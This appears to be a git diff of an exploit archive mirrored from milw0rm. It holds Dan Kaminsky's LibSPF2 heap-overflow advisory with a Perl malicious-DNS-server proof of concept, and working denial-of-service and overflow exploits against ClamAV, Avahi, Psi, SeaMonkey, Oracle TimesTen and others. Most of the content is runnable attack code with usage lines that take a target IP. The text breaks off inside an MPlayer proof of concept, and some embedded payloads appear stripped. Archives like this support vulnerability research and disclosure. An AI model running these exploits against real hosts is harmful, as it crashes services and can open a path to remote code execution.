-.toorrr.com..... -00000020 C0 0C 00 10 00 01 00 00 - 00 00 00 0F FF 76 3D 73 -.............v=s -00000030 70 66 31 20 6D 78 20 2B - 61 6C 6C C0 0C 00 10 00 pf1 mx -+all..... -00000040 01 00 00 00 00 00 EA E9 - 41 41 41 41 41 41 41 41 -........AAAAAAAA -00000050 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000060 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000070 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000080 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000090 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -000000A0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -000000B0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -000000C0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -000000D0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -000000E0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -000000F0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000100 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000110 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000120 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000130 41 A - -The altered length field, on 0x2C, is what’s causing the overflow. -Sample code to reproduce the above is attached at the end of this paper. - -Conclusion: - -There’s nothing particularly special about this bug – we’ve even seen -this in mail servers before. But it is apparently present on some very -high profile and high traffic systems. SPF is a major part of how the -Internet attempts to filter SPAM, and while it’s not perfect, it is -pretty helpful. LibSPF2 is one of the more common libraries out there -for handling SPF traffic, with billions of messages a day being -protected by it. - -Unfortunately, that also means billions of messages a day are at risk – -the nature of this flaw is such that an attacker can force arbitrary (or -at least ASCII encoded, though no nameservers have been found that -enforce ASCII) bytes to be copied into a buffer too small to contain -them. This is a straightforward anonymous remote code execution find, -made interesting specifically by where the bug happens to be. - - -Appendix: Simple code to reproduce heap overflow. - - -# cat spfattack.pl -#!/usr/bin/perl -# - -use Net::DNS; -use IO::Socket::INET; -use Data::HexDump; - - -my $qclass = "IN"; -my $ttl = 10; - -while (1){ - my $sock = IO::Socket::INET->new( - LocalPort => '53', - Proto => 'udp'); - $sock->recv($newmsg, 2048); - my $req = Net::DNS::Packet->new(\$newmsg); - $req->print; - my $id = $req->header->id(); - my @q = $req->question; - my $qname = $q[0]->qname; - my $qtype = $q[0]->qtype; - if($qtype eq "PTR") { next; } - $answer = Net::DNS::Packet->new($qname, $qtype); - if($qtype eq "TXT"){ - $answer->push(answer => Net::DNS::RR->new("$qname 0 $qclass $qtype -'v=spf1 mx +all'")); - $answer->push(answer => Net::DNS::RR->new("$qname 0 $qclass $qtype -'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'")); - } - if($qtype eq "MX"){} - - $answer->header->id($id); - $answer->header->aa(1); - $answer->header->qr(1); - $answer->print; - my $port = $sock->peerport; - my $peer = inet_ntoa($sock->peeraddr); - - $sock->shutdown(2); - $sock = ""; - - my $tempsock = IO::Socket::INET->new( - LocalPort=>'53', - PeerAddr=>"$peer", - PeerPort=>$port, - Proto=>'udp'); - - - my $newans; - - $newans = $answer->data; - if($qtype eq "TXT"){ - substr($newans, 44, 1, pack("c",0xff)); - print HexDump $newans; - } - $tempsock->send($newans); - - - #my $packet = Net::DNS::Packet->new(\$newmsg); -} - -# milw0rm.com [2008-10-22] +Advisory: DNS TXT Record Parsing Bug in LibSPF2 +Author: Dan Kaminsky, Director of Penetration Testing, IOActive Inc, +Dan.Kaminsky@ioactive.com (PGP Key In Appendix) +Abstract: + +A relatively common bug parsing TXT records delivered over DNS, dating +at least back to 2002 in Sendmail 8.2.0 and almost certainly much +earlier, has been found in LibSPF2, a library frequently used to +retrieve SPF (Sender Policy Framework) records and apply policy +according to those records. This implementation flaw allows for +relatively flexible memory corruption, and should thus be treated as a +path to anonymous remote code execution. Of particular note is that the +remote code execution would occur on servers specifically designed to +receive E-Mail from the Internet, and that these systems may in fact be +high volume mail exchangers. This creates privacy implications. It is +also the case that a corrupted email server is a useful “jumping off” +point for attackers to corrupt desktop machines, since attachments can +be corrupted with malware while the containing message stays intact. So +there are internal security implications as well, above and beyond +corruption of the mail server on the DMZ. + +Recommendations: + +If you are a major mail exchange, you should determine whether the SPAM +filters that protect your systems use LibSPF2. + +If you are a vendor of anti-SPAM devices, or the author of an operating +system with components that may use LibSPF2, you should determine +whether LibSPF2 is used in any of your configurations and migrate to +LibSPF 1.2.8, found at: + + http://www.libspf2.org/index.html + +If your product has a dependency on DNS TXT records, we recommend you +test it for the parsing bug that LibSPF2 was vulnerable to, since this +has been a problem for some time. Name server implementations may want +to consider adding filtering themselves, though record validation is not +normally their job. + +Details: DNS TXT records have long been a little tricky to parse, due +to them containing two length fields. First, there is the length field +of the record as a whole. Then, there is a sublength field, from 0 to +255, that describes the length of a particular character string inside +the larger record. There is nothing that links the two values, and DNS +servers to not themselves enforce sanity checks here. As such, there is +always a risk that when receiving a DNS TXT record, the outer record +length will be the amount allocated, but the inner length will be copied. + +In the past, we’ve seen this particular bug all over the place, +including in Sendmail. This is just the same bug, showing up in LibSPF2 +1.2.5: + +Spf_dns_resolv.c#SPF_dns_resolv_lookup(): + + case ns_t_txt: + if ( rdlen > 1 ) + { + u_char *src, *dst; + size_t len; + + if ( SPF_dns_rr_buf_realloc( spfrr, cnt, rdlen ) != +SPF_E_SUCCESS ) // allocate rdlen bytes at spf->rr[cn]->txt + return spfrr; + + dst = spfrr->rr[cnt]->txt; + len = 0; + src = (u_char *)rdata; + while ( rdlen > 0 ) + { + len = *src; // get a second length from the attacker +controlled datastream -- some value from 0 to 255, unbound to rdlen + src++; + memcpy( dst, src, len ); // copy that second length to +rdlen byte buffer. + dst += len; + src += len; + rdlen -= len + 1; + } + *dst = '\0'; + + For validation purposes, a build of LibSPF2 was instrumented, to +validate the heap overflow: + +$ ./spfquery -ip=1.2.3.4 -sender=foo@bar.toorrr.com +buffer 8107080 has size 16 +buffer 8107090 has size 16 +buffer 81070a0 has size 16 +writing 255 bytes to a 15 size buffer at 81070a0 // overflow +buffer 8123030 has size 234 +writing 233 bytes to a 234 size buffer at 8123030 +buffer 81060c0 has size 20 +buffer 81060e0 has size 20 +buffer 8123120 has size 234 +buffer 8106100 has size 31 +StartError +Context: Failed to query MAIL-FROM +ErrorCode: (2) Could not find a valid SPF record +Error: Invalid character in middle of mechanism near 'À + bar.toorrr' +Error: Failed to compile SPF record for 'bar.toorrr.com' +EndError +(invalid) + +The actual record used to spawn this behavior was as follows: + +;; HEADER SECTION +;; id = 63838 +;; qr = 1 opcode = QUERY aa = 1 tc = 0 rd = 1 +;; ra = 0 ad = 0 cd = 0 rcode = NOERROR +;; qdcount = 1 ancount = 2 nscount = 0 arcount = 0 + +;; QUESTION SECTION (1 record) +;; bar.toorrr.com. IN TXT + +;; ANSWER SECTION (2 records) +bar.toorrr.com. 0 IN TXT "v=spf1 mx +all" +bar.toorrr.com. 0 IN TXT +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + +;; AUTHORITY SECTION (0 records) + +;; ADDITIONAL SECTION (0 records) + +Or, in hex: + + 00 01 02 03 04 05 06 07 - 08 09 0A 0B 0C 0D 0E 0F +0123456789ABCDEF + +00000000 F9 5E 85 00 00 01 00 02 - 00 00 00 00 03 62 61 72 +.^...........bar +00000010 06 74 6F 6F 72 72 72 03 - 63 6F 6D 00 00 10 00 01 +.toorrr.com..... +00000020 C0 0C 00 10 00 01 00 00 - 00 00 00 0F FF 76 3D 73 +.............v=s +00000030 70 66 31 20 6D 78 20 2B - 61 6C 6C C0 0C 00 10 00 pf1 mx ++all..... +00000040 01 00 00 00 00 00 EA E9 - 41 41 41 41 41 41 41 41 +........AAAAAAAA +00000050 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000060 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000070 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000080 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000090 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +000000A0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +000000B0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +000000C0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +000000D0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +000000E0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +000000F0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000100 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000110 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000120 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000130 41 A + +The altered length field, on 0x2C, is what’s causing the overflow. +Sample code to reproduce the above is attached at the end of this paper. + +Conclusion: + +There’s nothing particularly special about this bug – we’ve even seen +this in mail servers before. But it is apparently present on some very +high profile and high traffic systems. SPF is a major part of how the +Internet attempts to filter SPAM, and while it’s not perfect, it is +pretty helpful. LibSPF2 is one of the more common libraries out there +for handling SPF traffic, with billions of messages a day being +protected by it. + +Unfortunately, that also means billions of messages a day are at risk – +the nature of this flaw is such that an attacker can force arbitrary (or +at least ASCII encoded, though no nameservers have been found that +enforce ASCII) bytes to be copied into a buffer too small to contain +them. This is a straightforward anonymous remote code execution find, +made interesting specifically by where the bug happens to be. + + +Appendix: Simple code to reproduce heap overflow. + + +# cat spfattack.pl +#!/usr/bin/perl +# + +use Net::DNS; +use IO::Socket::INET; +use Data::HexDump; + + +my $qclass = "IN"; +my $ttl = 10; + +while (1){ + my $sock = IO::Socket::INET->new( + LocalPort => '53', + Proto => 'udp'); + $sock->recv($newmsg, 2048); + my $req = Net::DNS::Packet->new(\$newmsg); + $req->print; + my $id = $req->header->id(); + my @q = $req->question; + my $qname = $q[0]->qname; + my $qtype = $q[0]->qtype; + if($qtype eq "PTR") { next; } + $answer = Net::DNS::Packet->new($qname, $qtype); + if($qtype eq "TXT"){ + $answer->push(answer => Net::DNS::RR->new("$qname 0 $qclass $qtype +'v=spf1 mx +all'")); + $answer->push(answer => Net::DNS::RR->new("$qname 0 $qclass $qtype +'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'")); + } + if($qtype eq "MX"){} + + $answer->header->id($id); + $answer->header->aa(1); + $answer->header->qr(1); + $answer->print; + my $port = $sock->peerport; + my $peer = inet_ntoa($sock->peeraddr); + + $sock->shutdown(2); + $sock = ""; + + my $tempsock = IO::Socket::INET->new( + LocalPort=>'53', + PeerAddr=>"$peer", + PeerPort=>$port, + Proto=>'udp'); + + + my $newans; + + $newans = $answer->data; + if($qtype eq "TXT"){ + substr($newans, 44, 1, pack("c",0xff)); + print HexDump $newans; + } + $tempsock->send($newans); + + + #my $packet = Net::DNS::Packet->new(\$newmsg); +} + +# milw0rm.com [2008-10-22] diff --git a/platforms/multiple/dos/7330.c b/platforms/multiple/dos/7330.c index 83f469e72..f4c918ce1 100755 --- a/platforms/multiple/dos/7330.c +++ b/platforms/multiple/dos/7330.c @@ -1,90 +1,90 @@ -/* -There is a recursive stack overflow in clamav 0.93.3 and 0.94 (and probably -older versions) in the jpeg parsing code. -it scan's the jpeg file, and if there is a thumbnail, it'll scan that too. the -thumbnail itself is just another jpeg -file and the same jpeg scanning function gets called without checking any kind -of recurising limit. this can easely -lead to a recurisive stack overflow. the vulnerable code looks like: -clamav-0.94\libclamav\special.c -int cli_check_jpeg_exploit(int fd) <-- fd to jpeg file -{ -... - if ((retval=jpeg_check_photoshop(fd)) != 0) { - return retval; - } -... -} -... -static int jpeg_check_photoshop(int fd) -{ -... - retval = jpeg_check_photoshop_8bim(fd); -... -} -... -static int jpeg_check_photoshop_8bim(int fd) -{ -... - retval = cli_check_jpeg_exploit(fd); <-- calls cli_check_jpeg_exploit() -again without any recursive checks ! -... -} - -the exploit shown below triggers this recursive stack overflow by creating a -fake jpg file. once created and passed on -to clamav it'll go in a recursive stack loop untill clamav runs out of stack -memory and causes a stack overflow. effectively -crashing clamav. The exploit was tested on clamav 0.94 on opensolaris running -in a vmware. -exploit: -*/ - -const char crashstr[] = "\xff\xd8" // jpg marker - "\xff\xed" // exif data - "\x00\x02" // length - "Photoshop 3.0\x00" - "8BIM" - "\x04\x0c" // thumbnail id - "\x00" - "\x01" - "\x01\x01\x01\x01" - "0123456789012345678912345678"; // skip over 28 bytes - -#include -#include -#include - -#define NR_ITER 200000 - -int main() { - FILE *fp; - int i; - fp = fopen("clamav-jpeg-crash.jpg", "w+"); - if (!fp) { - printf("can't open/create file\n"); - exit(0); - } - for (i = 0; i < NR_ITER; i++) { - fwrite(crashstr, sizeof(crashstr)-1/*don't want 0-byte ?*/, 1, -fp); - } - fclose(fp); - printf("done, now run clamscan on ./clamav-jpeg-crash.jpg\n"); - exit(0); -} - -/* -result: -ilja@opensolaris:~$ ./jpg -done, now run clamscan on ./clamav-jpeg-crash.jpg -ilja@opensolaris:~$ /usr/local/bin/clamscan ./clamav-jpeg-crash.jpg -LibClamAV Warning: ************************************************** -LibClamAV Warning: *** The virus database is older than 7 days! *** -LibClamAV Warning: *** Please update it as soon as possible. *** -LibClamAV Warning: ************************************************** -Segmentation Fault <-- clamav crashed ! -ilja@opensolaris:~$ -*/ - -// milw0rm.com [2008-12-03] +/* +There is a recursive stack overflow in clamav 0.93.3 and 0.94 (and probably +older versions) in the jpeg parsing code. +it scan's the jpeg file, and if there is a thumbnail, it'll scan that too. the +thumbnail itself is just another jpeg +file and the same jpeg scanning function gets called without checking any kind +of recurising limit. this can easely +lead to a recurisive stack overflow. the vulnerable code looks like: +clamav-0.94\libclamav\special.c +int cli_check_jpeg_exploit(int fd) <-- fd to jpeg file +{ +... + if ((retval=jpeg_check_photoshop(fd)) != 0) { + return retval; + } +... +} +... +static int jpeg_check_photoshop(int fd) +{ +... + retval = jpeg_check_photoshop_8bim(fd); +... +} +... +static int jpeg_check_photoshop_8bim(int fd) +{ +... + retval = cli_check_jpeg_exploit(fd); <-- calls cli_check_jpeg_exploit() +again without any recursive checks ! +... +} + +the exploit shown below triggers this recursive stack overflow by creating a +fake jpg file. once created and passed on +to clamav it'll go in a recursive stack loop untill clamav runs out of stack +memory and causes a stack overflow. effectively +crashing clamav. The exploit was tested on clamav 0.94 on opensolaris running +in a vmware. +exploit: +*/ + +const char crashstr[] = "\xff\xd8" // jpg marker + "\xff\xed" // exif data + "\x00\x02" // length + "Photoshop 3.0\x00" + "8BIM" + "\x04\x0c" // thumbnail id + "\x00" + "\x01" + "\x01\x01\x01\x01" + "0123456789012345678912345678"; // skip over 28 bytes + +#include +#include +#include + +#define NR_ITER 200000 + +int main() { + FILE *fp; + int i; + fp = fopen("clamav-jpeg-crash.jpg", "w+"); + if (!fp) { + printf("can't open/create file\n"); + exit(0); + } + for (i = 0; i < NR_ITER; i++) { + fwrite(crashstr, sizeof(crashstr)-1/*don't want 0-byte ?*/, 1, +fp); + } + fclose(fp); + printf("done, now run clamscan on ./clamav-jpeg-crash.jpg\n"); + exit(0); +} + +/* +result: +ilja@opensolaris:~$ ./jpg +done, now run clamscan on ./clamav-jpeg-crash.jpg +ilja@opensolaris:~$ /usr/local/bin/clamscan ./clamav-jpeg-crash.jpg +LibClamAV Warning: ************************************************** +LibClamAV Warning: *** The virus database is older than 7 days! *** +LibClamAV Warning: *** Please update it as soon as possible. *** +LibClamAV Warning: ************************************************** +Segmentation Fault <-- clamav crashed ! +ilja@opensolaris:~$ +*/ + +// milw0rm.com [2008-12-03] diff --git a/platforms/multiple/dos/7467.txt b/platforms/multiple/dos/7467.txt index 6821c3d9f..b39b7d549 100755 --- a/platforms/multiple/dos/7467.txt +++ b/platforms/multiple/dos/7467.txt @@ -1,29 +1,29 @@ -Amaya Web Browser html tag overflow (quite a few tags are vulnerable) - -(gdb) i r -eax 0x41414141 1094795585 -ecx 0x0 0 -edx 0xbfc0ff80 -1077870720 -ebx 0x9ec1220 166466080 -esp 0xbfc10064 0xbfc10064 -ebp 0xbfc10268 0xbfc10268 -esi 0xa2f64a0 170878112 -edi 0xbfc10160 -1077870240 -eip 0x8144b40 0x8144b40 -eflags 0x10246 [ PF ZF IF RF ] -cs 0x73 115 -ss 0x7b 123 -ds 0x7b 123 -es 0x7b 123 -fs 0x0 0 -gs 0x33 51 -(gdb) x/10x $ebp -0xbfc10268: 0x41414141 0x41414141 0x41414141 0x41414141 -0xbfc10278: 0x41414141 0x41414141 0x41414141 0x41414141 -0xbfc10288: 0x41414141 0x41414141 - - -#cat test.html -webDEViL - -# milw0rm.com [2008-12-15] +Amaya Web Browser html tag overflow (quite a few tags are vulnerable) + +(gdb) i r +eax 0x41414141 1094795585 +ecx 0x0 0 +edx 0xbfc0ff80 -1077870720 +ebx 0x9ec1220 166466080 +esp 0xbfc10064 0xbfc10064 +ebp 0xbfc10268 0xbfc10268 +esi 0xa2f64a0 170878112 +edi 0xbfc10160 -1077870240 +eip 0x8144b40 0x8144b40 +eflags 0x10246 [ PF ZF IF RF ] +cs 0x73 115 +ss 0x7b 123 +ds 0x7b 123 +es 0x7b 123 +fs 0x0 0 +gs 0x33 51 +(gdb) x/10x $ebp +0xbfc10268: 0x41414141 0x41414141 0x41414141 0x41414141 +0xbfc10278: 0x41414141 0x41414141 0x41414141 0x41414141 +0xbfc10288: 0x41414141 0x41414141 + + +#cat test.html +webDEViL + +# milw0rm.com [2008-12-15] diff --git a/platforms/multiple/dos/7520.c b/platforms/multiple/dos/7520.c index e43a6e6b0..dea44026e 100755 --- a/platforms/multiple/dos/7520.c +++ b/platforms/multiple/dos/7520.c @@ -1,85 +1,85 @@ -/* - * cve-2008-5081.c - * - * Avahi mDNS Daemon Remote DoS < 0.6.24 - * Jon Oberheide - * http://jon.oberheide.org - * - * Usage: - * - * gcc cve-2008-5081.c -ldnet -o cve-2008-5081 - * ./cve-2008-5081 1.2.3.4 - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5081 - * - * Crafted mDNS packet with source port 0 can cause avahi-daemon - * to abort() due to failed assertion assert(port > 0); in - * originates_from_local_legacy_unicast_socket() function in - * avahi-core/server.c. - * - */ - -#include -#include -#include -#include - -int -main(int argc, char **argv) -{ - ip_t *sock; - intf_t *intf; - struct addr dst; - struct ip_hdr *ip; - struct udp_hdr *udp; - struct intf_entry entry; - int len = IP_HDR_LEN + UDP_HDR_LEN; - char buf[len]; - - if (argc < 2 || addr_aton(argv[1], &dst)) { - printf("error: please specify a target ip address\n"); - return 1; - } - - memset(buf, 0, sizeof(buf)); - - ip = (struct ip_hdr *) buf; - ip->ip_v = 4; - ip->ip_hl = 5; - ip->ip_tos = 0; - ip->ip_off = 0; - ip->ip_sum = 0; - ip->ip_ttl = IP_TTL_MAX; - ip->ip_p = IP_PROTO_UDP; - ip->ip_id = htons(0xdead); - ip->ip_len = htons(len); - - udp = (struct udp_hdr *) (buf + IP_HDR_LEN); - - udp->uh_sum = 0; - udp->uh_sport = htons(0); - udp->uh_dport = htons(5353); - udp->uh_ulen = htons(UDP_HDR_LEN); - - intf = intf_open(); - intf_get_dst(intf, &entry, &dst); - intf_close(intf); - - ip->ip_src = entry.intf_addr.addr_ip; - ip->ip_dst = dst.addr_ip; - ip_checksum(buf, len); - - sock = ip_open(); - if (!sock) { - printf("error: root privileges needed for raw socket\n"); - return 1; - } - ip_send(sock, buf, len); - ip_close(sock); - - return 0; -} - -// milw0rm.com [2008-12-19] +/* + * cve-2008-5081.c + * + * Avahi mDNS Daemon Remote DoS < 0.6.24 + * Jon Oberheide + * http://jon.oberheide.org + * + * Usage: + * + * gcc cve-2008-5081.c -ldnet -o cve-2008-5081 + * ./cve-2008-5081 1.2.3.4 + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5081 + * + * Crafted mDNS packet with source port 0 can cause avahi-daemon + * to abort() due to failed assertion assert(port > 0); in + * originates_from_local_legacy_unicast_socket() function in + * avahi-core/server.c. + * + */ + +#include +#include +#include +#include + +int +main(int argc, char **argv) +{ + ip_t *sock; + intf_t *intf; + struct addr dst; + struct ip_hdr *ip; + struct udp_hdr *udp; + struct intf_entry entry; + int len = IP_HDR_LEN + UDP_HDR_LEN; + char buf[len]; + + if (argc < 2 || addr_aton(argv[1], &dst)) { + printf("error: please specify a target ip address\n"); + return 1; + } + + memset(buf, 0, sizeof(buf)); + + ip = (struct ip_hdr *) buf; + ip->ip_v = 4; + ip->ip_hl = 5; + ip->ip_tos = 0; + ip->ip_off = 0; + ip->ip_sum = 0; + ip->ip_ttl = IP_TTL_MAX; + ip->ip_p = IP_PROTO_UDP; + ip->ip_id = htons(0xdead); + ip->ip_len = htons(len); + + udp = (struct udp_hdr *) (buf + IP_HDR_LEN); + + udp->uh_sum = 0; + udp->uh_sport = htons(0); + udp->uh_dport = htons(5353); + udp->uh_ulen = htons(UDP_HDR_LEN); + + intf = intf_open(); + intf_get_dst(intf, &entry, &dst); + intf_close(intf); + + ip->ip_src = entry.intf_addr.addr_ip; + ip->ip_dst = dst.addr_ip; + ip_checksum(buf, len); + + sock = ip_open(); + if (!sock) { + printf("error: root privileges needed for raw socket\n"); + return 1; + } + ip_send(sock, buf, len); + ip_close(sock); + + return 0; +} + +// milw0rm.com [2008-12-19] diff --git a/platforms/multiple/dos/7555.py b/platforms/multiple/dos/7555.py index 74dc87206..34e1db714 100755 --- a/platforms/multiple/dos/7555.py +++ b/platforms/multiple/dos/7555.py @@ -1,23 +1,23 @@ -#!/usr/bin/python -#psi jabber client 8010/tcp remote denial of service (win & lin) -#by sha0[at]badchecksum.net -#http://jolmos.blogspot.com - -import socket, sys - -sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) -try: - sock.connect((sys.argv[1],8010)) -except: - print 'Cannot connect!' - sys.exit(1) - -try: - sock.send('\x05\xff') - print 'Crashed!' -except: - print 'Cannot send!' - -sock.close() - -# milw0rm.com [2008-12-23] +#!/usr/bin/python +#psi jabber client 8010/tcp remote denial of service (win & lin) +#by sha0[at]badchecksum.net +#http://jolmos.blogspot.com + +import socket, sys + +sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) +try: + sock.connect((sys.argv[1],8010)) +except: + print 'Cannot connect!' + sys.exit(1) + +try: + sock.send('\x05\xff') + print 'Crashed!' +except: + print 'Cannot send!' + +sock.close() + +# milw0rm.com [2008-12-23] diff --git a/platforms/multiple/dos/7564.pl b/platforms/multiple/dos/7564.pl index d76aaf273..352301aff 100755 --- a/platforms/multiple/dos/7564.pl +++ b/platforms/multiple/dos/7564.pl @@ -1,57 +1,57 @@ -#!/usr/bin/perl -# -# Getleft v1.2.0.0 DoS PoC -# Author: Koshi -# -# Application: Getleft v1.2 -# Publisher: Andres Garcia ( http://personal1.iddeo.es/andresgarci/getleft/english/index.html ) -# Description: Website Downloader, for such things as offline browsing. -# Tested On: Windows XP SP2 -# -# Module: Getleft.exe -# eax=00c5f170 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00c5f170 -# eip=004863eb esp=0022d9b0 ebp=010b4870 iopl=0 nv up ei pl nz na po nc -# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 -# -# Getleft+0x863eb: -# 004863eb 8b06 mov eax,dword ptr [esi] ds:0023:00000000=???????? -# -# , , - - -# milw0rm.com [2009-01-05] + + + + + + +# milw0rm.com [2009-01-05] diff --git a/platforms/multiple/dos/7685.pl b/platforms/multiple/dos/7685.pl index 576f02de2..8386a1e06 100755 --- a/platforms/multiple/dos/7685.pl +++ b/platforms/multiple/dos/7685.pl @@ -1,38 +1,38 @@ -#!/usr/bin/perl -# SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit -# by athos - staker[at]hotmail[dot]it -# tested on ubuntu 8.10 / slackware 12.2 -# thanks to SirDark because he has tested on slackware - -my $data = undef; -my $file = shift or &usage; - -exploit(); - -sub exploit { - - $data .= ""; - $data .= "SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit"; - $data .= ""; - $data .= "" x900; - $data .= ""; - - open(FILE,'>',$file) or die('file error'); - print FILE $data; - close(FILE); -} - - -sub usage { - - print "\n+---------------------------------------------------------+\r". - "\n| SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit |\r". - "\n+---------------------------------------------------------+\r". - "\nby athos - staker[at]hotmail[dot]it\n". - "\nUsage\n". - "\rperl $0 [file name]\n". - "\rperl $0 crash.html\n"; - exit; -} - -# milw0rm.com [2009-01-06] +#!/usr/bin/perl +# SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit +# by athos - staker[at]hotmail[dot]it +# tested on ubuntu 8.10 / slackware 12.2 +# thanks to SirDark because he has tested on slackware + +my $data = undef; +my $file = shift or &usage; + +exploit(); + +sub exploit { + + $data .= ""; + $data .= "SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit"; + $data .= ""; + $data .= "" x900; + $data .= ""; + + open(FILE,'>',$file) or die('file error'); + print FILE $data; + close(FILE); +} + + +sub usage { + + print "\n+---------------------------------------------------------+\r". + "\n| SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit |\r". + "\n+---------------------------------------------------------+\r". + "\nby athos - staker[at]hotmail[dot]it\n". + "\nUsage\n". + "\rperl $0 [file name]\n". + "\rperl $0 crash.html\n"; + exit; +} + +# milw0rm.com [2009-01-06] diff --git a/platforms/multiple/dos/7785.py b/platforms/multiple/dos/7785.py index 2c7e57ad9..f4908cc90 100755 --- a/platforms/multiple/dos/7785.py +++ b/platforms/multiple/dos/7785.py @@ -1,28 +1,28 @@ -#!/usr/bin/python - -""" -Oracle TimesTen Remote Format String (Fixed in Oracle CPU Jan 2009 -Copyright (c) Joxean Koret 2009 -""" - -import sys -import socket - -def testPoc(host): - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((host, 17000)) - buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n" - print "Sending: %s" % buf - s.send(buf) - print s.recv(4096) - s.close() - -if __name__ == "__main__": - if len(sys.argv) == 1: - print "Usage:", sys.argv[0], "" - print - sys.exit(1) - else: - testPoc(sys.argv[1]) - -# milw0rm.com [2009-01-14] +#!/usr/bin/python + +""" +Oracle TimesTen Remote Format String (Fixed in Oracle CPU Jan 2009 +Copyright (c) Joxean Koret 2009 +""" + +import sys +import socket + +def testPoc(host): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, 17000)) + buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n" + print "Sending: %s" % buf + s.send(buf) + print s.recv(4096) + s.close() + +if __name__ == "__main__": + if len(sys.argv) == 1: + print "Usage:", sys.argv[0], "" + print + sys.exit(1) + else: + testPoc(sys.argv[1]) + +# milw0rm.com [2009-01-14] diff --git a/platforms/multiple/dos/7812.pl b/platforms/multiple/dos/7812.pl index 043420062..8cdc9efae 100755 --- a/platforms/multiple/dos/7812.pl +++ b/platforms/multiple/dos/7812.pl @@ -1,49 +1,49 @@ -#!/usr/bin/perl -# MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC -# PoC by Amirreza Aminsalehi "sCORPINo" -# (Proud To be an Abay) -# scorpino x40 gmail x2e com -# 